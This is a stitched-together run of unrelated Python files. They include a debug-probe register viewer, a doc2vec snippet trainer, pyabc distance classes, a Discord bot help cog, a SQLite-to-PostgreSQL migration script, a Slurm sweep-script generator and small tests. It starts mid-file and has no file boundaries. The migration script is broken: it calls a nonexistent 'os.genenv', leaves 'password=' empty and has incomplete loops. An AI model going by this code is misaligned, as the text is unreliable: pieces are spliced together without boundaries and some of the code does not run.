\n''' obj = self.dev for name in input.split('.'): match = re.match(r'(\w+)\[(\d+)\]', name) name = re.sub(r'(\w+)\[\d+\]', r'\1', name) if name in obj.children: obj = obj.children[name] if isinstance(obj, svd.Peripheral): peri = obj if match and isinstance(obj, svd.RegisterArray): index = int(match.group(2)) if index < len(obj): obj = obj[index] else: print('index Overflow\n') return else: print(f'{name} Unknown\n') return if val == None: if isinstance(obj, svd.Peripheral) or isinstance(obj, svd.Cluster): addr, count = obj.addr, obj.nwrd elif isinstance(obj, svd.RegisterArray): addr, count = obj.addr, len(obj) else: addr, count = obj.addr, 1 if not isinstance(obj, svd.Peripheral): addr += peri.addr if count > 128: print('Too much to read\n') return values = self.xlk.read_mem_U32(addr, count) obj.load_value({addr-peri.addr+i*4: val for i, val in enumerate(values)}) print(obj) else: addr = peri.addr + obj.addr if isinstance(obj, svd.Register): try: val = int(val, 16) except Exception as e: print(f'{val} is not valid hexadecimal\n') return self.xlk.write_U32(addr, val) elif isinstance(obj, svd.Field): try: val = int(val, 10) except Exception as e: print(f'{val} is not valid decimal\n') return value = self.xlk.read_U32(addr) value = value & (~obj.mask) | (val << obj.pos) self.xlk.write_U32(addr, value) else: print('Can only write register and field\n') def complete_sv(self, pre_args, curr_arg, document, complete_event): if len(pre_args) == 0 and curr_arg: obj = self.dev names = curr_arg.split('.') for name in names[:-1]: match = re.match(r'(\w+)\[(\d+)\]', name) name = re.sub(r'(\w+)\[\d+\]', r'\1', name) if name in obj.children: obj = obj.children[name] if match and isinstance(obj, svd.RegisterArray): index = int(match.group(2)) if index < len(obj): obj = obj[index] else: return if isinstance(obj, svd.RegisterArray): return else: return yield from [Completion(name, -len(names[-1])) for name in ptkcmd.fuzzy_match(names[-1], obj.children.keys(), sort=False)] @connection_required def do_dis(self): '''display CallStack information coming from disassembling file. 
disassembling file can be built by command below: MDK: fromelf --text -a -c -o "$L@L.dis" "#L" IAR: ielfdumparm --code --source $TARGET_PATH$ -o $TARGET_PATH$.dis GCC: objdump -d $@ > $@.dis\n''' if os.path.isfile(self.dispath): cs = callstack.CallStack(self.dispath) if cs.Functions: print(f'{cs}\n') else: print("disassembling file parse Fail\n") else: print("disassembling file Not Exists\n") def do_env(self): '''display enviriment variables\n''' for key, val in self.env.items(): print(f'{key:<10s}{val}') print() def get_MDK_Packs_path(self): try: import winreg key = winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, r'UVPROJXFILE\Shell\open\command') val = winreg.QueryValue(key, '') key.Close() # "C:\Programs\uVision\UV4\UV4.exe" "%1" match = re.match(r'"(.+?)\\UV4\\UV4.exe"', val) if match: MDK_path = match.group(1) conf = configparser.ConfigParser() conf.read(os.path.join(MDK_path, 'TOOLS.INI'), encoding='gbk') Packs_path = conf.get('UV2', 'RTEPATH')[1:-1] if os.path.exists(Packs_path): return {'%Packs%': Packs_path} except: return {} def saveSetting(self): self.conf.set('paths', 'dllpath', self.dllpath) if self.svdpath in self.svdpaths: self.svdpaths.remove(self.svdpath) self.svdpaths.insert(0, self.svdpath) self.conf.set('paths', 'svdpath', repr(self.svdpaths[:10])) if self.dispath in self.dispaths: self.dispaths.remove(self.dispath) self.dispaths.insert(0, self.dispath) self.conf.set('paths', 'dispath', repr(self.dispaths[:10])) self.conf.write(open('setting.ini', 'w', encoding='utf-8')) #with ipdb.launch_ipdb_on_exception(): if __name__ == '__main__': cmd = DAPCmdr() cmd.cmdloop() #!/usr/bin/env python3 import unittest from fpmlib.typing import * import os.path from collections import OrderedDict from gensim.models.doc2vec import Doc2Vec, TaggedDocument from .snippet import Snippet from .utils import get_project_root class SnippetTrainer(object): def __init__(self, repo_id, snippets=None, path=None, external=False): self._snippets = snippets or Snippet.load_all(repo_id, merged_only=True, path=path) self.repo_id = repo_id self.external = external self._tokens = [] self._tagged_data = [] @property def snippets(self): """ Snippets used for the training. :return: All the availible snippets. :type: generator """ return iter(self._snippets) @property def tokens(self): """ Snippets used for the training as tokens. :return: List of tokens. :type: list """ if not self._tokens: if self.external: self._tokens = [{'0': self.snippets}] else: self._tokens = [ self._to_tokens(s) for s in self.snippets ] return self._tokens @property def tagged_data(self): if not self._tagged_data: self._tagged_data = list(self._make_tagged_data()) return self._tagged_data def _make_tagged_data(self): chunks_sha1 = set() for snippet in self.snippets: for chunk in snippet.chunks: # Skip chunks that were already added if chunk.sha1_hash in chunks_sha1: continue chunks_sha1.add(chunk.sha1_hash) tagged_line = TaggedDocument(words=chunk.merged_tokens, tags=[chunk.chunk_id]) yield tagged_line @staticmethod def _to_tokens(snippet): """ Represent a whole snippet as a single list of tokens. 
:type: list """ snippet_lines = [] # Only use target snippets for now for line in snippet.to_tokens(): snippet_lines += line return {snippet.snippet_id: snippet_lines} def evaluate(self, threshold=0.75): path = get_project_root() model_path = os.path.join(path, 'data', str(self.repo_id), 'd2v.model') if not os.path.isfile(model_path): return [] model = Doc2Vec.load(model_path) results = [] for snpt in self.snippets: snippet = OrderedDict() snippet['snippet_id'] = snpt.snippet_id for chnk in snpt.chunks: new_vector = model.infer_vector(chnk.merged_tokens) sims = model.docvecs.most_similar([new_vector]) candidates = [{'chunk_id': snip[0], 'confidence': snip[1]} for snip in sims if snip[1] >= threshold] chunk_info = chnk.to_json() chunk_info['candidates'] = candidates if snippet.get('chunks') is None: snippet['chunks'] = [chunk_info] else: snippet['chunks'].append(chunk_info) results.append(snippet) return results def train(self, iterations=20, force=False, path=None): if path is not None: model_dir = path else: model_dir = os.path.join(get_project_root(), 'data', str(self.repo_id)) model_path = os.path.join(model_dir, 'd2v.model') if not self.tagged_data: print('Nothing to train for: {0}'.format(self.repo_id)) return if force or not os.path.isfile(model_path): if not os.path.isdir(model_dir): os.makedirs(model_dir) print('Building new vocabulary') model = Doc2Vec(vector_size=50, alpha=0.025, # min_alpha=0.00025, min_count=2, dm=0, hs=1) model.build_vocab(self.tagged_data) else: print('Updating existing vocabulary') model = Doc2Vec.load(model_path) # model.trainables.reset_weights(model.hs, model.negative, model.wv, model.docvecs) # model.build_vocab(tagged_data, update=True) self.iterate(iterations, model=model, model_path=model_path) def iterate(self, times, **kwargs): if not times or times < 1: print('No iterations for: {0}'.format(self.repo_id)) return model = kwargs['model'] model_path = kwargs.get('model_path') # Reset iterations model.trainables.reset_weights(model.hs, model.negative, model.wv, model.docvecs) model.train(documents=self.tagged_data, total_examples=model.corpus_count, epochs=times) print('Unique word tokens: {0}'.format(len(model.wv.vocab))) print('Trained document tags: {0}'.format(len(model.docvecs))) model.save(model_path) print('Model saved for: {0}'.format(self.repo_id)) 0 """Distance base classes.""" from abc import ABC, abstractmethod from typing import List, Callable import json from ..sampler import Sampler class Distance(ABC): """ Abstract base class for distance objects. Any object that computes the similarity between observed and simulated data should inherit from this class. """ def initialize( self, t: int, get_all_sum_stats: Callable[[], List[dict]], x_0: dict = None): """ This method is called by the ABCSMC framework before the first use of the distance (at the beginning of ABCSMC.run()), and can be used to calibrate it to the statistics of the samples. The default is to do nothing. Parameters ---------- t: int Time point for which to initialize the distance. get_all_sum_stats: Callable[[], List[dict]] Returns on command the initial summary statistics. x_0: dict, optional The observed summary statistics. """ def configure_sampler( self, sampler: Sampler): """ This is called by the ABCSMC class and gives the distance the opportunity to configure the sampler. For example, the distance might request the sampler to also return rejected particles in order to adapt the distance to the statistics of the sample. 
The method is called by the ABCSMC framework before the first used of the distance (at the beginning of ABCSMC.run()), after initialize(). The default is to do nothing. Parameters ---------- sampler: Sampler The sampler used in ABCSMC. """ # pylint: disable=R0201 def update( self, t: int, get_all_sum_stats: Callable[[], List[dict]]) -> bool: """ Update the distance for the upcoming generation t. The default is to do nothing. Parameters ---------- t: int Time point for which to update the distance. get_all_sum_stats: Callable[[], List[dict]] Returns on demand a list of all summary statistics from the finished generation that should be used to update the distance. Returns ------- is_updated: bool Whether the distance has changed compared to beforehand. Depending on the result, the population needs to be updated in ABCSMC before preparing the next generation. Defaults to False. """ return False @abstractmethod def __call__( self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: """ Evaluate at time point t the distance of the summary statistics of the data simulated for the tentatively sampled particle to those of the observed data. Abstract method. This method has to be overwritten by all concrete implementations. Parameters ---------- x: dict Summary statistics of the data simulated for the tentatively sampled parameter. x_0: dict Summary statistics of the observed data. t: int Time point at which to evaluate the distance. Usually, the distance will not depend on the time. par: dict The parameters used to create the summary statistics x. These can be required by some distance functions. Usually, the distance will not depend on the parameters. Returns ------- distance: float Quantifies the distance between the summary statistics of the data simulated for the tentatively sampled particle and of the observed data. """ def get_config(self) -> dict: """ Return configuration of the distance. Returns ------- config: dict Dictionary describing the distance. """ return {"name": self.__class__.__name__} def to_json(self) -> str: """ Return JSON encoded configuration of the distance. Returns ------- json_str: str: JSON encoded string describing the distance. The default implementation is to try to convert the dictionary returned by ``get_config``. """ return json.dumps(self.get_config()) class NoDistance(Distance): """ Implements a kind of null object as distance function. This can be used as a dummy distance function if e.g. integrated modeling is used. .. note:: This distance function cannot be evaluated, so currently it is in particular not possible to use an epsilon threshold which requires initialization, because during initialization the distance function is invoked directly and not via the acceptor as usual. Conceptually, this would be possible and can be implemented on request. """ def __init__(self): super().__init__() def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: raise Exception( f"{self.__class__.__name__} is not intended to be called.") class IdentityFakeDistance(Distance): """ A fake distance function, which just passes the summary statistics on. This class assumes that the model already returns the distance. This can be useful in cases where simulating can be stopped early, when during the simulation some condition is reached which makes it impossible to accept the particle. 
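# Illustrative sketch, not part of the original module: a minimal concrete
# Distance built on the abstract interface documented above. Only __call__ is
# overridden; the summary-statistic key "mean" is an assumed example name.
class AbsDiffDistance(Distance):
    def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float:
        # compare simulated and observed summary statistics by absolute difference
        return abs(x["mean"] - x_0["mean"])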
""" def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: return x class AcceptAllDistance(Distance): """ Just a mock distance function which always returns -1. So any sample should be accepted for any sane epsilon object. Can be used for testing. """ def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: return -1 class SimpleFunctionDistance(Distance): """ This is a wrapper around a simple function which calculates the distance. If a function/callable is passed to the ABCSMC class, which is not subclassed from pyabc.Distance, then it is converted to an instance of the SimpleFunctionDistance class. Parameters ---------- fun: Callable[[dict, dict], float] A Callable accepting as parameters (a subset of) the arguments of the pyabc.Distance.__call__ function. Usually at least the summary statistics x and x_0. Returns the distance between both. """ def __init__(self, fun): super().__init__() self.fun = fun def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: return self.fun(x, x_0) def get_config(self): conf = super().get_config() # try to get the function name try: conf["name"] = self.fun.__name__ except AttributeError: try: conf["name"] = self.fun.__class__.__name__ except AttributeError: pass return conf def to_distance(maybe_distance): """ Parameters ---------- maybe_distance: either a Callable as in SimpleFunctionDistance, or a pyabc.Distance object. Returns ------- A Distance instance. """ if maybe_distance is None: return NoDistance() if isinstance(maybe_distance, Distance): return maybe_distance return SimpleFunctionDistance(maybe_distance) src/exts/misc.py0 from discord import File from discord.ext.commands import Command, CommandNotFound, is_owner from src.common.common import * INVITE_URL = "https://github.com/DJStompZone/emojis" VOTE_URL = "https://github.com/DJStompZone/emojis" GITHUB_URL = "https://github.com/DJStompZone/emojis" WHATS_NEW = "https://github.com/DJStompZone/emojis" def setup(bot): bot.add_cog(Misc(bot)) class Misc(Cog): __slots__ = ["bot"] def __init__(self, bot): self.bot = bot self.base_help_embed = Embed() self.bot.loop.create_task(self.create_help_embed()) async def create_help_embed(self) -> None: """ Create the top-level help Embed (list of commands). """ embed = Embed() embed.add_field(name="What's new?", value="⭐ %s" % WHATS_NEW, inline=False) # A list of cogs with an extra "Other" cog for uncategorised commands cogs = list(self.bot.cogs) + ["Other"] command_list = {cog: [] for cog in cogs} # Loop through each command and add it to the dictionary for cmd in self.bot.walk_commands(): if not cmd.hidden: cmd_usage = ">" + cmd.name if cmd.cog is not None: command_list[type(cmd.cog).__name__].append(cmd_usage) else: command_list["Other"].append(cmd_usage) # Add each cog's commands to the embed as a new field for name, commands in command_list.items(): if commands: embed.add_field( name=name, value="```\n%s\n```" % "\n".join(sorted(commands)), # Code block ) self.base_help_embed = embed async def get_command_info(self, command_name) -> Command: """ Get information on a command. :param command_name: The command name to look up. :return: The Command object of the command found. """ cmd = self.bot.get_command(command_name) if not cmd: raise CommandNotFound("That command (`%s`) doesn't exist." 
% command_name) return cmd @command( name="help", description="Get information on the bot.", usage=">help [command]", aliases=("commands",), ) async def help(self, ctx, command_name=None): """ Get help for the bot. Users can specify command_name to get specific help on a command, or omit for a list of commands. :param ctx: :param command_name: [Optional] The command name to look up. """ # Get specific information on a command if command_name: cmd = await self.get_command_info(command_name) embed = ( Embed(title=command_name.lower()) .add_field(name="Description", value=cmd.description or "None") .add_field(name="Usage", value="`%s`" % cmd.usage or "None") .add_field( name="Aliases", value="`%s`" % "`, `".join(cmd.aliases) if cmd.aliases else "None", ) ) await ctx.send(embed=embed) # Get a list of commands else: await ctx.send(embed=self.base_help_embed) @command( name="ping", description="Pong!", usage=">ping", aliases=( "latency", "pong", ), ) async def ping(self, ctx) -> None: """ Get the bot's latency. """ latency = str(round(self.bot.latency * 1000, 2)) + "ms" await ctx.send(embed=Embed(title="Pong :ping_pong: ", description=f"{latency}")) @command( name="invite", description="Invite the bot to your server.", usage=">invite", aliases=("inv",), ) async def invite(self, ctx) -> None: """ Get the invite link for the bot. """ await ctx.send( embed=Embed( description=":orange_heart: **[Click here to invite the bot.](%s)**" % INVITE_URL ) ) # @command( # name="vote", # description="Vote for the bot.", # usage=">vote", # aliases=("v",), # ) # async def vote(self, ctx) -> None: # """ Get the link to vote for the bot. """ # await ctx.send( # embed=Embed( # description=":orange_heart: **[Click here to vote for the bot.](%s)**" # % VOTE_URL # ) # ) # @command( # name="support", # description="Support the bot on GitHub.", # usage=">support", # aliases=( # "supp", # "sup", # ), # ) # async def support(self, ctx) -> None: # """ Get the GitHub link for the bot. """ # await ctx.send( # embed=Embed( # description=":orange_heart: **[Click here to star & watch the bot on GitHub.](%s)**" # % GITHUB_URL # ) # ) # @command( # name="usage", # description="View command usage.", # usage=">usage", # hidden=True, # ) # @is_owner() # async def usage(self, ctx) -> None: # """ View usage stats for the bot. """ # query = db.usage.find({}, {"_id": False}) # async for i in query: # results = dict(i) # sort = sorted(results, key=lambda x: results[x], reverse=True) # usage = ["`>%s`: %d" % (x, results[x]) for x in sort] # pic = None # try: # with open("./data/stats/usage.png", "rb") as f: # pic = File(f) # except OSError: # pass # await ctx.send( # embed=Embed( # description="%s\n\nTotal: %d" # % ("\n".join(usage), sum(results.values())) # ), # file=pic, # ) # return @command( name="reload", description="Reload a cog.", usage=">reload", hidden=True, ) @is_owner() async def reload(self, ctx, cog) -> None: """ Reload a cog. """ await self.bot.reload_extension("src.exts.%s" % cog.lower()) @command( name="servers", description="View the number of servers the bot is in.", usage=">servers", aliases=("guilds",), hidden=True, ) @is_owner() async def servers(self, ctx): """ View the number of servers the bot is in. 
""" await ctx.send(embed=Embed(description="%d servers" % len(self.bot.guilds))) import psycopg2 import os import sqlite3 import pandas as pd from dotenv import load_dotenv from sqlalchemy import create_engine load_dotenv() SQL_DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "module1-introduction-to-sql", "rpg_db.sqlite3") PG_DB_NAME = os.genenv("PG_DB_NAME") PG_DB_USER = os.genenv("PG_DB_USER") PG_DB_PASSWORD = os.genenv("PG_DB_PASSWORD") PG_DB_HOST = os.genenv("PG_DB_HOST") PG_ALCHEMY_ENGINE = os.genenv("PG_ALCHEMY_ENGINE") SQL_ALCHEMY_ENGINE = os.genenv("SQL_ALCHEMY_ENGINE") sqlconn = sqlite3.connect(SQL_DB_FILEPATH) pgconn = psycopg2.connect(dbname=PG_DB_NAME, user=PG_DB_USER, password=, host=PG_DB_HOST) pg_engine = create_engine(PG_ALCHEMY_ENGINE) sql_engine = create_engine(SQL_ALCHEMY_ENGINE) sqlcurs = sqlconn.cursor() pgcurs = pgconn.cursor() # create a list of table names in preparation for our pandas import sql_table_names = [] sql_table_query = """ SELECT name from sqlite_master where type = 'table' """ for table_name in sqlcurs.execute(sql_table_query): pragma_query = f""" PRAGMA foreign_key_list({table_name}) """ foreign_keys = sqlcurs.execute(pragma_query).fetchall() sql_table_names.append(table_name) # create a dictionary of pandas dataframes tables_dict = {} for name in sql_table_names: table = pd.read_sql_table() # another alternative to the below query # ALTER TABLE distributors ADD CONSTRAINT distfk FOREIGN KEY (address) # REFERENCES addresses (address) MATCH FULL; # create tables from pandas to postgresql for i in tables_dict: insert_keys_query = """ ALTER TABLE table_name ADD INDEX(column_name); """ keysend-to-route/test_keysend_to_route.py from keysend_to_route import keysend_to_route route = [{"id":"02dfdcca40725ca204eec5d43a9201ff13fcd057c369c058ce4f19e5c178da09f3","channel":"693998x1139x0","direction":1,"msatoshi":6001,"amount_msat":"6001msat","delay":58,"style":"tlv"},{"id":"","channel":"693777x2877x0","direction":0,"msatoshi":1000,"amount_msat":"1000msat","delay":18,"style":"tlv"}] def test_sendmsg_success(): keysend_to_route(route, is_test=True) """Constructs the script for a Slurm array job that performs a parameter sweep. By default each parameter setting is assigned to its own parallel job. This can be changed with the `runs_per_job` flag to reduce the total number of jobs, in which case multiple parameter settings will be run sequentially in each job. 
Requirements: python3.6+, numpy, absl-py Example usage: python make_parameter_array_job.py --out=script_name.sh \ --param_linspace="foo,0,3,4" --param_linspace="bar,4.5,5.5,11" \ -- my_script --arg1 Creates script_name.sh that runs "my_script --arg1 --foo=FOO --bar=BAR" for all foo in (0, 1, 2, 3) and all bar in (4.5, 4.6, ..., 5.5) python make_parameter_array_job.py --out=script_name.sh \ --param_logspace="foo,0.01,10,4" -- my_script --arg1 Creates script_name.sh that runs "my_script --arg1 --foo=FOO" for all foo in (0.01, 0.1, 1, 10) """ import math import pathlib import shlex import typing from typing import Iterable, List from absl import app from absl import flags import numpy as np FLAGS = flags.FLAGS flags.DEFINE_string("out", None, "Name for created job script file") flags.mark_flag_as_required("out") flags.DEFINE_string("dir", str(pathlib.Path.home()) + "/jobscripts/", "Base directory for job scripts") flags.DEFINE_string("outdir", str(pathlib.Path.home()) + "/output/", "Base directory for job output") HEADER_FLAGS = ["job-name", "output", "error", "time", "mem", "cpus-per-task"] for header_flag in HEADER_FLAGS: flags.DEFINE_string(header_flag, None, f"Sets the Slurm flag '{header_flag}'") flags.DEFINE_multi_string( "param_linspace", [], "Sweeps linearly spaced values for a parameter." ' Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x between ' "START and STOP inclusive") flags.DEFINE_multi_string( "param_intlinspace", [], "Sweeps linearly spaced integer values for a " 'parameter Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x' " between START and STOP inclusive") flags.DEFINE_multi_string( "param_logspace", [], "Sweeps geometrically spaced values for a parameter." ' Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x between ' "START and STOP inclusive") flags.DEFINE_multi_string( "param_intlogspace", [], "Sweeps geometrically spaced values for a " 'parameter. Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x ' "between START and STOP inclusive") flags.DEFINE_multi_string( "param_list", [], "Explicit list of values for a parameter. Given in the" ' form "NAME,VAL1,VAL2[,VAL3,...]".') flags.DEFINE_integer("repeat", 1, "Number of times to repeat each parameter setting.") flags.DEFINE_integer("runs_per_job", 1, "Number of parameter to sequentially run in each job") def validate_multiparam_str(param_str: str): """Validates parameter settings for linspace and logspace parameters. Checks that the value is of the form "NAME,START,STOP,NUM" where START and STOP are floats with START <= STOP and NUM is an integer. Args: param_str: The `str` value of the parameter to test. Returns: True if the parameter setting is valid. Raises: flags.ValidationError: The parameter setting is invalid. """ vals = param_str.split(",") if len(vals) != 4: raise flags.ValidationError( 'Array param value must be "NAME,START,STOP,NUM"') try: start = float(vals[1]) stop = float(vals[2]) num = int(vals[3]) except ValueError as e: raise flags.ValidationError( 'Array param "NAME,START,STOP,NUM" must have float' " START and STOP and int NUM") from e if start > stop: raise flags.ValidationError( 'Array param "NAME,START,STOP,NUM" must have START <= STOP') if num < 1: raise flags.ValidationError( 'Array param "NAME,START,STOP,NUM" must have NUM > 0') return True def validate_all_multiparam(param_list: List[str]) -> bool: """Validates a list of parameter settings for linspace/logspace parameters. 
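# Illustrative sketch (standalone, assumed values): how one "NAME,START,STOP,NUM"
# linspace flag, e.g. --param_linspace="foo,0,3,4", expands into parameter values,
# mirroring the module docstring above.
import numpy as np
name, start, stop, num = "foo,0,3,4".split(",")
values = [str(x) for x in np.linspace(float(start), float(stop), int(num))]
# values -> ['0.0', '1.0', '2.0', '3.0'], i.e. runs use --foo=0.0 ... --foo=3.0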
See validate_multiparam_str() Args: param_list: A list of str parameter values. Returns: True if the each parameter value is valid. Raises: flags.ValidationError: One or more parameter value is invalid. """ for param_str in param_list: valid = validate_multiparam_str(param_str) if not valid: return valid return True def validate_param_list_str(param_str: str): """Validates parameter settings for explicit parameter lists. Checks that the value is of the form "NAME,VAL1,VAL2[,VAL3,...]". Args: param_str: The `str` value of the parameter to test. Returns: True if the parameter setting is valid. Raises: flags.ValidationError: The parameter setting is invalid. """ vals = param_str.split(",") if len(vals) < 3: raise flags.ValidationError( 'param_list value must be "NAME,VAL1,VAL2[,VAL3,...]"') return True def validate_all_param_list(param_list: List[str]) -> bool: """Validates a list of explicitly listed parameters. See validate_param_list_str() Args: param_list: A list of str parameter values. Returns: True if the each parameter value is valid. Raises: flags.ValidationError: One or more parameter value is invalid. """ for param_str in param_list: valid = validate_param_list_str(param_str) if not valid: return valid return True flags.register_validator("param_linspace", validate_all_multiparam) flags.register_validator("param_intlinspace", validate_all_multiparam) flags.register_validator("param_logspace", validate_all_multiparam) flags.register_validator("param_intlogspace", validate_all_multiparam) flags.register_validator("param_list", validate_all_param_list) class ParamArray(typing.NamedTuple): """Collects a parameter name with a list of possible values. Attributes: param: The parameter name. values: A list of str parameter values. """ param: str values: List[str] def parse_param_array(param_str: str, linspace: bool = True, integer: bool = False) -> ParamArray: """Converts a linspace/logspace parameter string into an array of values. The str should be in format "NAME,START,STOP,NUM". See validate_multiparam_str() for more details. Args: param_str: The str value of the parameter. linspace: If true, specifies a linearly spaced array. If false, specifies a geometrically spaced array. integer: Rounds to integer values for the parameter. Duplicate values will be skipped. Returns: A `ParamArray` containing the list of parameter values. """ flag_vals = param_str.split(",") assert len(flag_vals) == 4 start = float(flag_vals[1]) stop = float(flag_vals[2]) num = int(flag_vals[3]) if linspace: param_vals = np.linspace(start, stop, num) else: param_vals = np.logspace(math.log10(start), math.log10(stop), num) if integer: param_vals = np.unique(np.rint(param_vals).astype(np.int)) return ParamArray(flag_vals[0], [str(x) for x in param_vals]) def parse_all_param_arrays(param_list: List[str], linspace: bool = True, integer: bool = False) -> List[ParamArray]: """Parses a list of parameter str values into arrays. See parse_parameter_array() Args: param_list: A list of str values for different parameters. linspace: If true, the strings are for linearly spaced arrays. If false, geometrically spaced arrays. Returns: A list of `ParamArray` containing all parameter values. """ return [parse_param_array(s, linspace=linspace, integer=integer) for s in param_list] def parse_explicit_param_list(param_str: str) -> ParamArray: """Parses parameter values explicitly listed in str form. The str should be in form "NAME,VAL1,VAL2[,VAL3,...]". 
Args: param_str: The str value of the parameter, in form "NAME,VAL1,VAL2[,VAL3,...]" Returns: A `ParamArray` containing the parameter values. """ tokens = param_str.split(",") assert len(tokens) > 2 return ParamArray(tokens[0], tokens[1:]) def parse_all_param_lists(param_lists: List[str]) -> List[ParamArray]: """Parses a list of param_list values into arrays. See parse_explicit_param_list() Args: param_lists: A list of param_list strs for different parameters. Returns: A list of `ParamArray` containing all parameter values. """ return [parse_explicit_param_list(s) for s in param_lists] def script_header(num_jobs: int) -> List[str]: """Constructs the header of the array job script. Args: num_jobs: The number of parallel jobs in the job array. Returns: A list of header lines for the script. """ assert num_jobs >= 1 header = [] header.append("#!/bin/bash") if num_jobs > 1: header.append(f"#SBATCH --array=1-{num_jobs}") for flag in HEADER_FLAGS: if FLAGS[flag].value: header.append(f"#SBATCH --{flag}={FLAGS[flag].value}") return header def script_param_arrays(param_arrays: Iterable[ParamArray]) -> List[str]: """Constructs the parameter arrays used in the array job script. Args: param_arrays: A list of `ParamArray` representing all possible values for the gridsearch parameters. Returns: A list of array initialization lines for the script. """ result = [] for param_array in param_arrays: result.append(f"{param_array.param}=({' '.join(param_array.values)})") return result def script_param_indexing(array_lengths: Iterable[int], repeat: int) -> List[str]: """Creates the script lines that set parameter indices for a run. Args: array_lengths: The number of parameter settings used for each parameter, in order. repeat: The number of times to repeat each parameter setting Returns: A list of script lines that set the parameter indices. """ indexing = [] indexing.append(f"idx=$((run_index / {repeat}))") for i, l in reversed(list(enumerate(array_lengths))): indexing.append(f"param_index[{i}]=$((idx % {l}))") indexing.append(f"((idx /= {l}))") return indexing def script_run(command: str, param_names: Iterable[str], array_job: bool) -> List[str]: """Creates the script lines that run a single parameter setting. Args: command: The base program string to be executed, without parameter settings. param_names: A list of names for parameters that vary between runs. array_job: True if the runs are split between more than one job. Returns: A list of script runs that set up and execute the run. """ output = [] params = [] for i, name in enumerate(param_names): params.append(f"--{name}=${{{name}[${{param_index[{i}]}}]}}") param_str = " ".join(params) run = [command, param_str] if FLAGS.outdir: if array_job: outfile = (f"{FLAGS.outdir}${{SLURM_JOB_NAME}}" "-${SLURM_ARRAY_JOB_ID}-r${run_index}.out") else: outfile = (f"{FLAGS.outdir}${{SLURM_JOB_NAME}}" "-${SLURM_JOB_ID}-r${run_index}.out") output.append(f'outfile="{outfile}"') output.append('echo "${command}" >> ${outfile}') output.append(f'echo "# {param_str}" | tee -a ${{outfile}}') run.append(" | tee -a ${outfile}") else: output.append(f'echo "# {param_str}"') run_str = " ".join(run) output.append(run_str) return output def script_loop(command: str, param_arrays: List[ParamArray], runs_per_job: int, total_runs: int, repeat: int) -> List[str]: """Constructs the script loop that executes all runs for a job. Args: command: The base program string to be executed, without parameter settings. 
param_arrays: A list of `ParamArray` that gives the settings for parameters that are varied across runs. Contains the settings for all jobs, not just the current one. runs_per_job: The number of runs executed in each individual job. total_runs: The number of runs executed across all jobs. repeat: Number of times to repeat each parameter setting Returns: A list of script lines for executing all job runs. """ loop = [] initial_index_array = ["0"] * len(param_arrays) loop.append(f"param_index=({' '.join(initial_index_array)})") loop.append(f'command="# {command}"') loop.append("echo ${command}") loop.append(f"for ((run=0; run < {runs_per_job}; run++)); do") inner = [] if runs_per_job < total_runs: inner.append( f"run_index=$(({runs_per_job}*$((${{SLURM_ARRAY_TASK_ID}} - 1))" " + ${run}))") else: inner.append("run_index=${run}") inner.append(f'if [[ "${{run_index}}" -ge {total_runs} ]]; then') inner.append(" break") inner.append("fi") inner += script_param_indexing((len(pa.values) for pa in param_arrays), repeat) inner.append("") inner += script_run(command, (pa.param for pa in param_arrays), (runs_per_job < total_runs)) loop += [" " + line for line in inner] loop.append("done") return loop def main(argv): param_arrays = ( parse_all_param_arrays(FLAGS.param_linspace, linspace=True) + parse_all_param_arrays(FLAGS.param_intlinspace, linspace=True, integer=True) + parse_all_param_arrays(FLAGS.param_logspace, linspace=False) + parse_all_param_arrays(FLAGS.param_intlogspace, linspace=False, integer=True) + parse_all_param_lists(FLAGS.param_list)) repeat = FLAGS.repeat; if repeat < 1: print(f"Invalid repeat count {repeat}. Set to 1 for no repeat.") return -1 total_runs = math.prod(len(pa.values) for pa in param_arrays) total_runs *= repeat runs_per_job = FLAGS.runs_per_job num_jobs = (total_runs + (runs_per_job - 1)) // runs_per_job # ceiling div if FLAGS.outdir: outdir = pathlib.Path(FLAGS.outdir) if not outdir.is_dir(): print("Invalid output directory", outdir) return -1 outdir = outdir.resolve() if not FLAGS.output: if num_jobs > 1: FLAGS.output = str(outdir / "%x-%A-j%a.out") else: FLAGS.output = str(outdir / "%x-%j-j0.out") if not FLAGS.error: if num_jobs > 1: FLAGS.error = str(outdir / "%x-%A-j%a.err") else: FLAGS.error = str(outdir / "%x-%j-j0.err") script = script_header(num_jobs) script.append("") script += script_param_arrays(param_arrays) script.append("") script += script_loop(" ".join(shlex.quote(s) for s in argv[1:]), param_arrays, runs_per_job, total_runs, repeat) scriptdir = pathlib.Path(FLAGS.dir) if not scriptdir.is_dir(): print("Invalid script directory", scriptdir) return -1 script_path = scriptdir / FLAGS.out with script_path.open("w") as jobscript: print("\n".join(script), file=jobscript) if __name__ == "__main__": app.run(main) import unittest from site_analysis.polyhedral_site_collection import PolyhedralSiteCollection from site_analysis.polyhedral_site import PolyhedralSite from unittest.mock import patch, Mock class PolyhedralSiteCollectionTestCase(unittest.TestCase): def test_site_collection_is_initialised(self): sites = [Mock(spec=PolyhedralSite), Mock(spec=PolyhedralSite)] with patch('site_analysis.polyhedral_site_collection' '.construct_neighbouring_sites') as mock_construct_neighbouring_sites: mock_construct_neighbouring_sites.return_value = 'foo' site_collection = PolyhedralSiteCollection(sites=sites) self.assertEqual(site_collection.sites, sites) mock_construct_neighbouring_sites.assert_called_with(site_collection.sites) 
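# The assertion above verifies that PolyhedralSiteCollection passed its own sites list
# to the patched construct_neighbouring_sites helper; the assertion below verifies that
# the mocked return value ('foo') was stored as _neighbouring_sites.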
